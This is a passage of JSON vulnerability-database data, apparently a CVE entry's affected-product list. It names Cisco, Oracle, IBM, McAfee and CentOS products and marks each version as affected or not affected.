"trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell iuh", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.2.0" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified workforce optimization quality management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "unified workforce optimization", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified sip proxy software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "unified ip conference phone for third-party call control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "unified ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69450" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69010" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager im \u0026 presence service (formerly c", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "ucs manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs central software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs b-series blade servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs series and series fabric interconnects", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "620063000" }, { "model": "uc integration for microsoft lync", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence tx9000 series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system tx1310", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8200" }, { "model": "telepresence server on multiparty media and", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3103200" }, { "model": "telepresence server and mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "701087100" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence isdn gateway mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "telepresence isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "tandberg codian isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "stealthwatch udp director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "stealthwatch management console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "stealthwatch identity", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa525g 5-line ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa122 analog telephone adapter with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart net total care local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "smart care", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "small business series managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "services provisioning platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secure access control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "registered envelope service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime optical for service providers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime infrastructure plug and play standalone gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "partner support service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "packaged contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ons series multiservice provisioning platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154540" }, { "model": "onepk all-in-one virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches standalone nx-os mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "nexus series fabric switches aci mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "nexus series blade switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "network performance analysis", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "netflow generation appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac appliance clean access server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "nac appliance clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "mxe series media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "multicast manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for iphone and ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber client framework components", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ip series phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "intracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "content security appliance update servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud web security", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud object storage", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptors", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for mac os", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "x0" }, { "model": "anyconnect secure mobility client for linux", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "27000" }, { "model": "agent for openflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ace30 application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ace application control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "47100" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "series stackable managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "series smart plus switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2200" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.1.8" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.0.28" }, { "model": "oss support tools", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "8.15.17.3.14" }, { "model": "email gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.6.406-3402.103" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.08" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "tivoli provisioning manager for images build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13150-13" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.3.1" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.5" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.11" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.23" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.3-6513" }, { "model": "wireless lan controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.4" }, { "model": "webex meetings server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.1.30" }, { "model": "webex meetings for windows phone", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "82.8" }, { "model": "webex meetings client on-premises t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "webex meetings client hosted t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "webex centers t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "virtualization experience media edition", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "virtual security gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.6" }, { "model": "videoscape anyres live", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.7.2" }, { "model": "video surveillance ptz ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70002.9" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60002.9" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "video surveillance series high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "40002.9" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30002.9" }, { "model": "video distribution suite for internet streaming", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.003(002)" }, { "model": "universal small cell iuh", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70003.5.12.23" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50003.5.12.23" }, { "model": "unity express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "unified workforce optimization quality management solution 11.5 su1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified sip proxy software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "unified meetingplace 8.6mr1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified ip conference phone for third-party call control 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "unified ip conference phone 10.3.1sr4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "unified ip phone 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6901" }, { "model": "unified intelligent contact management enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "unified intelligence center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6(1)" }, { "model": "unified contact center express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "unified contact center enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-3.0" }, { "model": "ucs b-series blade servers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.1.3" }, { "model": "uc integration for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.3" }, { "model": "telepresence video communication server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "telepresence tx9000 series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "telepresence system tx1310", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "telepresence system ex series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence system ex series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-376.1" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-326.1" }, { "model": "telepresence system series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30006.1" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "13006.1" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11006.1" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10006.1" }, { "model": "telepresence sx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence sx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8204.4" }, { "model": "telepresence server on multiparty media and", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3103204.4" }, { "model": "telepresence server and mse", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "701087104.4" }, { "model": "telepresence profile series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence profile series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence mx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence mx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence mcu", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.5(1.89)" }, { "model": "telepresence integrator c series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence integrator c series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "spa122 analog telephone adapter with router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "spa112 2-port phone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "services provisioning platform sfp1.1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.13" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.8" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.7" }, { "model": "prime performance manager sp1611", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.7" }, { "model": "prime network services controller 1.01u", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.3.5" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.0" }, { "model": "prime network", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "431" }, { "model": "prime infrastructure", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "prime collaboration provisioning", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "prime collaboration assurance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "ons series multiservice provisioning platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1545410.7" }, { "model": "nexus series switches standalone nx-os mode 7.0 i5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-" }, { "model": "nexus series fabric switches aci mode", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70006.2.19" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60006.2.19" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50006.2.19" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "nexus series blade switches 4.1 e1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4000" }, { "model": "nexus series switches 5.2 sv3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1000v" }, { "model": "network analysis module", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.2(2)" }, { "model": "network analysis module 6.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "netflow generation appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.1(1)" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90006.2.19" }, { "model": "mds series multilayer switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "jabber software development kit", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "jabber guest", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11" }, { "model": "jabber for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "jabber for mac", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "jabber for iphone and ipad", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "jabber for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "jabber client framework components", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "ip interoperability and collaboration system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0(1)" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.4" }, { "model": "ios and cisco ios xe software", "scope": "ne", 